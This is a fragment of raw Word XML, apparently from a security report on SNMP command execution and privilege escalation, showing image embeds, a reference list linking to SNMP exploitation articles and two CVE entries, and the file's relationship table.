            <wp:docPr id="12" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="259971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spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="422031"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="22" name="image27.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image27.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="422031"/>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jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fr47l8xupydn" w:id="66"/>
      <w:bookmarkEnd w:id="66"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q4t39xyu3ih" w:id="67"/>
      <w:bookmarkEnd w:id="67"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference List</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId63">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId64">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://mogwailabs.de/en/blog/2019/10/abusing-linux-snmp-for-rce/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId65">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId66">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2020-15862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DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId67">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.mail-archive.com/debian-bugs-dist@lists.debian.org/msg1755822.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId68">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://serverfault.com/questions/1057463/grant-a-user-sudo-powers-to-start-stop-etc-a-systemd-service-w-o-sudo-password</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId69">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://nvd.nist.gov/vuln/detail/CVE-2021-36740</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>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b w:val="1"/>
          <w:bCs w:val="1"/>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sectPr>
      <w:headerReference r:id="rId70" w:type="default"/>
      <w:headerReference r:id="rId71" w:type="first"/>
      <w:footerReference r:id="rId72" w:type="default"/>
      <w:footerReference r:id="rId7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1.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><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image" Target="media/image47.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mogwailabs.de/en/blog/2019/10/abusing-linux-snmp-for-rce/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-15862" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/rangeforce/snmp-arbitrary-command-execution-19a6088c888e" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://serverfault.com/questions/1057463/grant-a-user-sudo-powers-to-start-stop-etc-a-systemd-service-w-o-sudo-password" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.mail-archive.com/debian-bugs-dist@lists.debian.org/msg1755822.html" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-36740" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image57.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId1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